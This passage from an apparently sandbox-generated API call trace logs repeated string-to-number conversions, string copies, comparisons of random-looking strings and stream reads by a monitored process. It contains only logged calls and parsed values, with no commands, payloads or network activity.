(_Str="5900") returned 5900 [0059.413] atoi (_Str="50") returned 50 [0059.413] VarI4FromStr (in: strIn="27966", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.413] VarI4FromStr (in: strIn="27967", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.413] atoi (_Str="5900") returned 5900 [0059.413] atoi (_Str="50") returned 50 [0059.414] VarI4FromStr (in: strIn="27966", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.414] VarI4FromStr (in: strIn="27967", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.414] atoi (_Str="161") returned 161 [0059.414] atoi (_Str="1284") returned 1284 [0059.414] atoi (_Str="1305") returned 1305 [0059.414] atoi (_Str="161") returned 161 [0059.414] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="sE1Vg" | out: _Dst="sE1Vg") returned 0x0 [0059.415] atoi (_Str="65") returned 65 [0059.415] atoi (_Str="97") returned 97 [0059.415] atoi (_Str="122") returned 122 [0059.415] atoi (_Str="149") returned 149 [0059.415] atoi (_Str="121") returned 121 [0059.415] atoi (_Str="1593") returned 1593 [0059.415] atoi (_Str="1605") returned 1605 [0059.416] VarR8FromStr (in: strIn="28463.32537968", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.416] VarR4FromR8 (in: dblIn=0xd3054b19, pfltOut=0x40dbcbd4 | out: pfltOut=0x40dbcbd4) returned 0x0 [0059.416] VarI4FromStr (in: strIn="14720", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.416] atoi (_Str="736") returned 736 [0059.416] VarR8FromStr (in: strIn="6951.5740316124", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.416] VarR4FromR8 (in: dblIn=0xf3bc5a21, pfltOut=0x40bb2792 | out: pfltOut=0x40bb2792) returned 0x0 [0059.416] atoi (_Str="633") returned 633 [0059.416] atoi (_Str="672") returned 672 [0059.416] VarR8FromStr (in: strIn="6951.5740316124", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.416] VarR4FromR8 (in: dblIn=0xf3bc5a21, pfltOut=0x40bb2792 | out: pfltOut=0x40bb2792) returned 0x0 [0059.417] atoi (_Str="149") returned 149 [0059.417] atoi (_Str="121") returned 121 [0059.417] atoi (_Str="1593") returned 1593 [0059.417] atoi (_Str="1605") returned 1605 [0059.417] atoi (_Str="149") returned 149 [0059.417] atoi (_Str="121") returned 121 [0059.418] atoi (_Str="1593") returned 1593 [0059.418] atoi (_Str="1605") returned 1605 [0059.418] VarR8FromStr (in: strIn="15635.941204056", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.418] VarR4FromR8 (in: dblIn=0x795fdfb1, pfltOut=0x40ce89f8 | out: pfltOut=0x40ce89f8) returned 0x0 [0059.418] VarI4FromStr (in: strIn="14720", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.418] atoi (_Str="736") returned 736 [0059.419] atoi (_Str="236") returned 236 [0059.419] atoi (_Str="309") returned 309 [0059.419] atoi (_Str="192") returned 192 [0059.419] atoi (_Str="1506") returned 1506 [0059.419] atoi (_Str="1497") returned 1497 [0059.420] VarI4FromStr (in: strIn="1959338690", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.420] atoi (_Str="309") returned 309 [0059.420] atoi (_Str="192") returned 192 [0059.420] atoi (_Str="1506") returned 1506 [0059.420] atoi (_Str="1497") returned 1497 [0059.420] VarR8FromStr (in: strIn="2792.7758662185", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.420] VarR4FromR8 (in: dblIn=0x3e56450f, pfltOut=0x40a5d18d | out: pfltOut=0x40a5d18d) returned 0x0 [0059.421] atoi (_Str="320") returned 320 [0059.421] atoi (_Str="17") returned 17 [0059.421] atoi (_Str="1506") returned 1506 [0059.421] atoi (_Str="1497") returned 1497 [0059.421] atoi (_Str="6032") returned 6032 [0059.421] atoi (_Str="232") returned 232 [0059.421] atoi (_Str="0") returned 0 [0059.421] VarI4FromStr (in: strIn="21796", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.422] atoi (_Str="309") returned 309 [0059.422] atoi (_Str="192") returned 192 [0059.422] atoi (_Str="1506") returned 1506 [0059.422] atoi (_Str="1497") returned 1497 [0059.422] atoi (_Str="170") returned 170 [0059.422] atoi (_Str="6032") returned 6032 [0059.422] atoi (_Str="232") returned 232 [0059.422] atoi (_Str="730") returned 730 [0059.422] atoi (_Str="770") returned 770 [0059.422] VarR8FromStr (in: strIn="46170.757171807", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.422] VarR4FromR8 (in: dblIn=0x3ac05e91, pfltOut=0x40e68b58 | out: pfltOut=0x40e68b58) returned 0x0 [0059.423] atoi (_Str="309") returned 309 [0059.423] atoi (_Str="192") returned 192 [0059.423] atoi (_Str="1506") returned 1506 [0059.423] atoi (_Str="1497") returned 1497 [0059.423] VarR8FromStr (in: strIn="28398.47922995", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.423] VarR4FromR8 (in: dblIn=0xabb418a1, pfltOut=0x40dbbb9e | out: pfltOut=0x40dbbb9e) returned 0x0 [0059.423] atoi (_Str="6032") returned 6032 [0059.423] atoi (_Str="232") returned 232 [0059.423] VarR8FromStr (in: strIn="12399.751056026", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.423] VarR4FromR8 (in: dblIn=0x229a9691, pfltOut=0x40c837e0 | out: pfltOut=0x40c837e0) returned 0x0 [0059.423] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="sE1Vg" | out: _Dst="sE1Vg") returned 0x0 [0059.423] atoi (_Str="71") returned 71 [0059.423] atoi (_Str="48") returned 48 [0059.424] atoi (_Str="57") returned 57 [0059.424] atoi (_Str="567") returned 567 [0059.424] atoi (_Str="7") returned 7 [0059.424] VarI4FromStr (in: strIn="26910", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.424] atoi (_Str="8970") returned 8970 [0059.424] atoi (_Str="891") returned 891 [0059.424] atoi (_Str="919") returned 919 [0059.424] atoi (_Str="7088") returned 7088 [0059.424] VarI4FromStr (in: strIn="19967", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.424] atoi (_Str="487") returned 487 [0059.424] VarI4FromStr (in: strIn="1970891720", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.424] atoi (_Str="7088") returned 7088 [0059.425] atoi (_Str="567") returned 567 [0059.425] atoi (_Str="7") returned 7 [0059.425] VarI4FromStr (in: strIn="26910", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.425] atoi (_Str="8970") returned 8970 [0059.425] VarR8FromStr (in: strIn="59733.036312131", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.425] VarR4FromR8 (in: dblIn=0x29780ee3, pfltOut=0x40ed2aa1 | out: pfltOut=0x40ed2aa1) returned 0x0 [0059.425] atoi (_Str="891") returned 891 [0059.425] atoi (_Str="919") returned 919 [0059.425] VarI4FromStr (in: strIn="19967", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.425] atoi (_Str="487") returned 487 [0059.425] VarR8FromStr (in: strIn="59733.036312131", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.425] VarR4FromR8 (in: dblIn=0x29780ee3, pfltOut=0x40ed2aa1 | out: pfltOut=0x40ed2aa1) returned 0x0 [0059.425] atoi (_Str="4797") returned 4797 [0059.426] atoi (_Str="9") returned 9 [0059.426] VarI4FromStr (in: strIn="26910", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.426] atoi (_Str="8970") returned 8970 [0059.426] VarI4FromStr (in: strIn="979145764", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.426] VarI4FromStr (in: strIn="979145764", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.426] atoi (_Str="4797") returned 4797 [0059.426] atoi (_Str="9") returned 9 [0059.426] VarI4FromStr (in: strIn="26910", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.426] atoi (_Str="8970") returned 8970 [0059.426] VarR8FromStr (in: strIn="14757.831929063", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.426] VarR4FromR8 (in: dblIn=0x7ca6cb17, pfltOut=0x40ccd2ea | out: pfltOut=0x40ccd2ea) returned 0x0 [0059.427] VarI4FromStr (in: strIn="14807", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.427] atoi (_Str="221") returned 221 [0059.427] atoi (_Str="2367") returned 2367 [0059.427] atoi (_Str="2359") returned 2359 [0059.427] atoi (_Str="1534") returned 1534 [0059.427] atoi (_Str="1554") returned 1554 [0059.427] atoi (_Str="0") returned 0 [0059.427] VarI4FromStr (in: strIn="23672", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.427] atoi (_Str="538") returned 538 [0059.427] VarR8FromStr (in: strIn="29056.405274249", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.427] VarR4FromR8 (in: dblIn=0xf0036757, pfltOut=0x40dc6019 | out: pfltOut=0x40dc6019) returned 0x0 [0059.427] CExposedStream::Read () returned 0x0 [0059.427] CExposedStream::Read () returned 0x0 [0059.428] VarI4FromStr (in: strIn="14807", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.428] atoi (_Str="221") returned 221 [0059.428] atoi (_Str="2367") returned 2367 [0059.428] atoi (_Str="2359") returned 2359 [0059.428] VarR8FromStr (in: strIn="17130.171984322", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.428] VarR4FromR8 (in: dblIn=0x1ca879b, pfltOut=0x40d0ba8b | out: pfltOut=0x40d0ba8b) returned 0x0 [0059.428] atoi (_Str="1534") returned 1534 [0059.428] atoi (_Str="1554") returned 1554 [0059.428] VarR8FromStr (in: strIn="17130.171984322", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.428] VarR4FromR8 (in: dblIn=0x1ca879b, pfltOut=0x40d0ba8b | out: pfltOut=0x40d0ba8b) returned 0x0 [0059.428] VarI4FromStr (in: strIn="23672", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.428] atoi (_Str="538") returned 538 [0059.428] atoi (_Str="34") returned 34 [0059.429] atoi (_Str="148") returned 148 [0059.429] atoi (_Str="2") returned 2 [0059.429] atoi (_Str="2367") returned 2367 [0059.429] atoi (_Str="2359") returned 2359 [0059.429] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="kHUlbvXDy", cchCount1=-1, lpString2="EIpDb", cchCount2=-1) returned 3 [0059.429] VarR8FromStr (in: strIn="38501.876698457", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.429] VarR4FromR8 (in: dblIn=0xde9ec29, pfltOut=0x40e2ccbc | out: pfltOut=0x40e2ccbc) returned 0x0 [0059.429] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="kHUlbvXDy", cchCount1=-1, lpString2="EIpDb", cchCount2=-1) returned 3 [0059.430] VarI4FromStr (in: strIn="14807", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.430] atoi (_Str="221") returned 221 [0059.430] atoi (_Str="2367") returned 2367 [0059.430] atoi (_Str="2359") returned 2359 [0059.430] VarR8FromStr (in: strIn="54207.173245672", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.430] VarR4FromR8 (in: dblIn=0x8b3a81ed, pfltOut=0x40ea77e5 | out: pfltOut=0x40ea77e5) returned 0x0 [0059.430] atoi (_Str="1534") returned 1534 [0059.430] atoi (_Str="1554") returned 1554 [0059.431] VarI4FromStr (in: strIn="23672", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.431] atoi (_Str="538") returned 538 [0059.431] VarI4FromStr (in: strIn="14807", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.431] atoi (_Str="221") returned 221 [0059.431] atoi (_Str="2367") returned 2367 [0059.431] atoi (_Str="2359") returned 2359 [0059.432] atoi (_Str="108") returned 108 [0059.432] atoi (_Str="1534") returned 1534 [0059.432] atoi (_Str="1554") returned 1554 [0059.432] VarI4FromStr (in: strIn="809087262", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.432] VarI4FromStr (in: strIn="23672", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.432] atoi (_Str="538") returned 538 [0059.432] VarR8FromStr (in: strIn="31100.742268933", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.432] VarR4FromR8 (in: dblIn=0x81558e05, pfltOut=0x40de5f2f | out: pfltOut=0x40de5f2f) returned 0x0 [0059.433] VarI4FromStr (in: strIn="29484", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.433] atoi (_Str="162") returned 162 [0059.433] atoi (_Str="3473") returned 3473 [0059.433] atoi (_Str="3477") returned 3477 [0059.433] atoi (_Str="833") returned 833 [0059.433] atoi (_Str="859") returned 859 [0059.433] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="While", cchCount1=-1, lpString2="bxKQM", cchCount2=-1) returned 3 [0059.434] VarR8FromStr (in: strIn="56528.116622855", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.434] VarR4FromR8 (in: dblIn=0xbb5fda86, pfltOut=0x40eb9a03 | out: pfltOut=0x40eb9a03) returned 0x0 [0059.435] VarR8FromStr (in: strIn="19794.79381198", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.435] VarR4FromR8 (in: dblIn=0xcdd0c351, pfltOut=0x40d354b2 | out: pfltOut=0x40d354b2) returned 0x0 [0059.435] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="While", cchCount1=-1, lpString2="bxKQM", cchCount2=-1) returned 3 [0059.435] atoi (_Str="209") returned 209 [0059.435] atoi (_Str="111") returned 111 [0059.436] atoi (_Str="3473") returned 3473 [0059.436] atoi (_Str="3477") returned 3477 [0059.436] VarR8FromStr (in: strIn="18164.168899519", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.436] VarR4FromR8 (in: dblIn=0xcf3fed9b, pfltOut=0x40d1bd0a | out: pfltOut=0x40d1bd0a) returned 0x0 [0059.436] atoi (_Str="209") returned 209 [0059.436] atoi (_Str="111") returned 111 [0059.437] atoi (_Str="3473") returned 3473 [0059.437] atoi (_Str="3477") returned 3477 [0059.437] atoi (_Str="218") returned 218 [0059.437] atoi (_Str="209") returned 209 [0059.437] atoi (_Str="111") returned 111 [0059.437] atoi (_Str="3473") returned 3473 [0059.437] atoi (_Str="3477") returned 3477 [0059.437] atoi (_Str="833") returned 833 [0059.438] atoi (_Str="859") returned 859 [0059.438] atoi (_Str="209") returned 209 [0059.438] atoi (_Str="111") returned 111 [0059.438] atoi (_Str="3473") returned 3473 [0059.438] atoi (_Str="3477") returned 3477 [0059.438] VarI4FromStr (in: strIn="17827", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.439] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="sE1Vg" | out: _Dst="sE1Vg") returned 0x0 [0059.439] atoi (_Str="4") returned 4 [0059.439] atoi (_Str="43") returned 43 [0059.439] VarI4FromStr (in: strIn="24090", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.439] atoi (_Str="8030") returned 8030 [0059.439] atoi (_Str="2879") returned 2879 [0059.440] atoi (_Str="2887") returned 2887 [0059.440] atoi (_Str="150") returned 150 [0059.440] atoi (_Str="346") returned 346 [0059.440] atoi (_Str="374") returned 374 [0059.440] VarI4FromStr (in: strIn="19890", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.440] atoi (_Str="390") returned 390 [0059.440] VarR8FromStr (in: strIn="51546.200349251", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.440] VarR4FromR8 (in: dblIn=0x6942d51a, pfltOut=0x40e92b46 | out: pfltOut=0x40e92b46) returned 0x0 [0059.441] atoi (_Str="8453") returned 8453 [0059.441] atoi (_Str="107") returned 107 [0059.441] atoi (_Str="2879") returned 2879 [0059.441] atoi (_Str="2887") returned 2887 [0059.441] VarR8FromStr (in: strIn="16498.576654683", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.441] VarR4FromR8 (in: dblIn=0xe7e90b24, pfltOut=0x40d01ca4 | out: pfltOut=0x40d01ca4) returned 0x0 [0059.442] atoi (_Str="8453") returned 8453 [0059.442] atoi (_Str="107") returned 107 [0059.444] atoi (_Str="2879") returned 2879 [0059.444] atoi (_Str="2887") returned 2887 [0059.444] VarI4FromStr (in: strIn="1018392930", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.445] VarI4FromStr (in: strIn="24090", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.445] atoi (_Str="8030") returned 8030 [0059.445] atoi (_Str="2879") returned 2879 [0059.445] atoi (_Str="2887") returned 2887 [0059.445] atoi (_Str="12") returned 12 [0059.445] atoi (_Str="346") returned 346 [0059.446] atoi (_Str="374") returned 374 [0059.446] VarI4FromStr (in: strIn="23654", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.446] atoi (_Str="355") returned 355 [0059.446] atoi (_Str="161") returned 161 [0059.446] atoi (_Str="6455") returned 6455 [0059.446] atoi (_Str="6451") returned 6451 [0059.447] atoi (_Str="355") returned 355 [0059.447] atoi (_Str="161") returned 161 [0059.447] atoi (_Str="6455") returned 6455 [0059.447] atoi (_Str="6451") returned 6451 [0059.447] atoi (_Str="9528") returned 9528 [0059.448] atoi (_Str="397") returned 397 [0059.448] VarI4FromStr (in: strIn="1962704442", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.448] VarR8FromStr (in: strIn="13670.778632067", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.448] VarR4FromR8 (in: dblIn=0xaa372fb1, pfltOut=0x40cab363 | out: pfltOut=0x40cab363) returned 0x0 [0059.448] atoi (_Str="309") returned 309 [0059.448] atoi (_Str="206") returned 206 [0059.449] atoi (_Str="6455") returned 6455 [0059.449] atoi (_Str="6451") returned 6451 [0059.449] atoi (_Str="309") returned 309 [0059.449] atoi (_Str="206") returned 206 [0059.449] atoi (_Str="6455") returned 6455 [0059.450] atoi (_Str="6451") returned 6451 [0059.450] atoi (_Str="0") returned 0 [0059.450] VarR8FromStr (in: strIn="48146.852255497", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.450] VarR4FromR8 (in: dblIn=0x45ad51ee, pfltOut=0x40e7825b | out: pfltOut=0x40e7825b) returned 0x0 [0059.451] VarI4FromStr (in: strIn="14832", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.452] VarR8FromStr (in: strIn="62419.603179062", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.452] VarR4FromR8 (in: dblIn=0x4d3e2d1e, pfltOut=0x40ee7a73 | out: pfltOut=0x40ee7a73) returned 0x0 [0059.452] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="sE1Vg" | out: _Dst="sE1Vg") returned 0x0 [0059.454] VarI4FromStr (in: strIn="28336", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.454] VarR8FromStr (in: strIn="63866.300259523", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.454] VarR4FromR8 (in: dblIn=0x9bb9dbf3, pfltOut=0x40ef2f49 | out: pfltOut=0x40ef2f49) returned 0x0 [0059.455] VarI4FromStr (in: strIn="28336", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.455] VarI4FromStr (in: strIn="31784", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.455] VarI4FromStr (in: strIn="31784", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.455] CRetailMalloc_Realloc () returned 0x888d558 [0059.456] VarI4FromStr (in: strIn="21105", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.456] VarR8FromStr (in: strIn="61096.660286604", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.456] VarR4FromR8 (in: dblIn=0x21115f45, pfltOut=0x40edd515 | out: pfltOut=0x40edd515) returned 0x0 [0059.456] VarR8FromStr (in: strIn="61096.660286604", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.456] VarR4FromR8 (in: dblIn=0x21115f45, pfltOut=0x40edd515 | out: pfltOut=0x40edd515) returned 0x0 [0059.457] VarI4FromStr (in: strIn="25732", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.457] VarI4FromStr (in: strIn="20891", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.457] CExposedStream::Read () returned 0x0 [0059.457] CExposedStream::Read () returned 0x0 [0059.457] atoi (_Str="330") returned 330 [0059.457] atoi (_Str="385") returned 385 [0059.457] atoi (_Str="2792") returned 2792 [0059.457] atoi (_Str="2799") returned 2799 [0059.457] VarI4FromStr (in: strIn="25732", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.457] atoi (_Str="919") returned 919 [0059.457] atoi (_Str="198") returned 198 [0059.457] atoi (_Str="44") returned 44 [0059.457] atoi (_Str="8") returned 8 [0059.458] VarR8FromStr (in: strIn="1068.8305673311", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.458] VarR4FromR8 (in: dblIn=0x803e10cd, pfltOut=0x4090b352 | out: pfltOut=0x4090b352) returned 0x0 [0059.458] VarI4FromStr (in: strIn="29937", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.458] atoi (_Str="201") returned 201 [0059.458] atoi (_Str="60") returned 60 [0059.458] atoi (_Str="2792") returned 2792 [0059.458] atoi (_Str="2799") returned 2799 [0059.458] VarR8FromStr (in: strIn="5398.4736646348", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.458] VarR4FromR8 (in: dblIn=0x4215e3bd, pfltOut=0x40b51679 | out: pfltOut=0x40b51679) returned 0x0 [0059.458] VarI4FromStr (in: strIn="25732", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.458] atoi (_Str="919") returned 919 [0059.458] atoi (_Str="0") returned 0 [0059.458] VarR8FromStr (in: strIn="5398.4736646348", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.459] VarR4FromR8 (in: dblIn=0x4215e3bd, pfltOut=0x40b51679 | out: pfltOut=0x40b51679) returned 0x0 [0059.459] atoi (_Str="330") returned 330 [0059.459] atoi (_Str="385") returned 385 [0059.459] atoi (_Str="2792") returned 2792 [0059.459] atoi (_Str="2799") returned 2799 [0059.459] VarI4FromStr (in: strIn="13678", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.459] VarI4FromStr (in: strIn="25732", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.459] atoi (_Str="919") returned 919 [0059.459] atoi (_Str="44") returned 44 [0059.459] atoi (_Str="8") returned 8 [0059.459] atoi (_Str="0") returned 0 [0059.459] VarR8FromStr (in: strIn="12918.004880855", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.459] VarR4FromR8 (in: dblIn=0x9fef944d, pfltOut=0x40c93b00 | out: pfltOut=0x40c93b00) returned 0x0 [0059.459] atoi (_Str="722") returned 722 [0059.460] atoi (_Str="736") returned 736 [0059.460] atoi (_Str="6561") returned 6561 [0059.460] atoi (_Str="6565") returned 6565 [0059.460] VarI4FromStr (in: strIn="1851207392", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.460] atoi (_Str="129") returned 129 [0059.460] atoi (_Str="155") returned 155 [0059.460] VarR8FromStr (in: strIn="49999.872126436", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.460] VarR4FromR8 (in: dblIn=0xe875b313, pfltOut=0x40e869fb | out: pfltOut=0x40e869fb) returned 0x0 [0059.460] atoi (_Str="722") returned 722 [0059.460] atoi (_Str="736") returned 736 [0059.461] atoi (_Str="6561") returned 6561 [0059.461] atoi (_Str="6565") returned 6565 [0059.461] atoi (_Str="3232") returned 3232 [0059.461] atoi (_Str="7380") returned 7380 [0059.461] atoi (_Str="9") returned 9 [0059.461] atoi (_Str="6561") returned 6561 [0059.461] atoi (_Str="6565") returned 6565 [0059.461] atoi (_Str="205") returned 205 [0059.461] atoi (_Str="7380") returned 7380 [0059.461] atoi (_Str="9") returned 9 [0059.461] atoi (_Str="6561") returned 6561 [0059.461] atoi (_Str="6565") returned 6565 [0059.461] atoi (_Str="7380") returned 7380 [0059.461] atoi (_Str="9") returned 9 [0059.462] atoi (_Str="6561") returned 6561 [0059.462] atoi (_Str="6565") returned 6565 [0059.462] strcpy_s (in: _Dst=0x75060958, _DstSize=0x100, _Src="sE1Vg" | out: _Dst="sE1Vg") returned 0x0 [0059.462] atoi (_Str="63") returned 63 [0059.462] strcpy_s (in: _Dst=0x75060420, _DstSize=0x100, _Src="EwqPK5Nx" | out: _Dst="EwqPK5Nx") returned 0x0 [0059.462] atoi (_Str="8919") returned 8919 [0059.462] atoi (_Str="9") returned 9 [0059.462] VarI4FromStr (in: strIn="15630", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.463] atoi (_Str="1563") returned 1563 [0059.463] atoi (_Str="192") returned 192 [0059.463] atoi (_Str="215") returned 215 [0059.463] VarR8FromStr (in: strIn="58724.98544338", lcid=0x409, dwFlags=0x80000000, pdblOut=0x750603e8 | out: pdblOut=0x750603e8) returned 0x0 [0059.463] VarR4FromR8 (in: dblIn=0x88c08e25, pfltOut=0x40ecac9f | out: pfltOut=0x40ecac9f) returned 0x0 [0059.464] VarI4FromStr (in: strIn="15822", lcid=0x409, dwFlags=0x80000000, plOut=0x750603e8 | out: plOut=0x750603e8) returned 0x0 [0059.464] atoi (_Str="586") returned 586 [0059.464] VarI4FromStr (in: 